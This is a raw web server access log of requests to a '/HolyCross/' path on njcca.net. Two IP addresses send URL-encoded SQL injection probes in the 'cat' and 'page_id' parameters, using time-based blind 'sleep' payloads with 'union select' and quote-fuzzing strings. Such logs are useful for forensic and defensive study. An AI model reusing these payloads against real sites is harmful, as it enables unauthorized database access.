91.90.126.75 - - [04/Mar/2023:01:33:08 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:09 -0800] "GET /HolyCross/?cat=7%27and%28select%2Afrom%28select%2Bsleep%286%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%27 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:09 -0800] "GET /HolyCross/?page_id=365%E9%8E%88%27%22%5C%28 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:11 -0800] "GET /HolyCross/?page_id=365 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:11 -0800] "GET /HolyCross/?cat=7%22and%28select%2Afrom%28select%2Bsleep%280%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%22 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:12 -0800] "GET /HolyCross/?page_id=365%27%22%5C%28 HTTP/1.1" 200 33105 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
165.231.182.35 - - [04/Mar/2023:01:33:14 -0800] "GET /HolyCross/?cat=7%22and%28select%2Afrom%28select%2Bsleep%286%29%29a%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2B1%29%3D%22 HTTP/1.1" 404 31891 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
91.90.126.75 - - [04/Mar/2023:01:33:14 -0800] "GET /HolyCross/?page_id=%28select%2Afrom%28select%2Bsleep%280%29union%2F%2A%2A%2Fselect%2B1%29a%29 HTTP/1.1" 200 55152 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1" "njcca.net"
